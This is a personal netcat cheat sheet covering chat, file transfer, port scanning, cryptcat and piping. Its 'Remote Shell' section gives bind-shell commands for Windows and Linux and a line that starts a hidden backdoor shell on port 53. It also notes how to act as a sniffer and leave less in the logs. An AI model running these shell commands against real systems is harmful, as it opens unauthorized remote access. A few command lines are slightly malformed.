Netcat

Updated: April 27, 2024

Netcat can be used for several things regarding networking.

NETCAT || ACTIVATE LISTENER FIRST THEN CLIENT

nc
  -g, --gateway=LIST   # force data through a certain path
  -G, --pointer=NUM    # track the connection for troubleshooting
  -o, --output=FILE    # output hexdump traffic to file, use as sniffer of mitm attack.
  -s --source=ADDRESS  # local source address.

Messanger (unencrypted)

nc -l 31337    # start listening on a port - listener
    -l    # listen mode for inbound connects
    -L    # listen harder and on socket close
    -p    # port.  Not needed in most cases like -l

nc 10.73.31.145 31337   # client

File Transfer (better to just use rsync+ssh or scp)

nc -v -w 30 31337 -l < technolust.txt  # listener
    -v, --verbose   # show details as things go.
    -w    # wait n seconds before timing out when initiated and after completed.

nc -v -w 2 10.72.31.179 31337 > technolust.txt    # client

Does not alter the stream of data but is not stealthy. Anything sent out will be logged on the server it is being sent to.

nc <routersip> <port-to-open>
nc 192.168.0.1  81
HTTP/1.1 200
nc 192.168.0.1 22
nc www.google.com 80
GET / HTTP/1.1

Port Scanning

nc -v -w 1 192.168.0.9 -z 1-1000    # scan first 1000 ports.
    -t    # TCP ports
    -u    # UDP ports
    -n    # no DNS, bypass name resolution to reduce footprint in the logs
    
    echo -n "GET / HTTP/1.0\r\n\r\n" | nc host.example.com 80  # pull homepage of website

Remote Shell

# WINDOWS
nc -Lp 31337 -vv -e cmd.exe   # setup on windows.  listener
nc [ipofwindowsmachine] 31337   # client

nc hak5.wifipinnaple.com 80 -e cmd.exe    # client from another network
_________________________________________________________________________
# LINUX
nc -lp 31337 -e /bin/zsh
nc [ipoflinuxmachine] 31337

Ghost in the wires
nc -l -p 53 -e /bin /sh &  # creates a backdoor with root access

CRYPTCAT

cryptcat -k password [ipofotherperson] 1337
cryptcat -k password -l 1337

Talk to processes (moved pictures from linux to windows machine)

tar -cf - Pictures | nc -l 1337    #listener linux
nc [ipoflinuxmachine] | tar -xf -   #client windows

cat web.jpg | -l 1337   #listener linux
nc [ipoflinuxmachine] 1337 > web.jpg

Piping

nc -l 1337 | nc www.google.com 80 | nc -l 1338

mknod /tmp/backpipe p   # create temperary file called backpipe with p option, make it a named pipe.  now we can pipe the input and output into a listening nc session.  (need an interactive program)
frotz ~/zork/DATA/ZORK1.DAT
frotz ~/zork/DATA/ZORK1.DAT 0</tmp/backpipe | nc -l 1337 1>/tmp/backpipe
nc [ipwherezorkrunning] 1337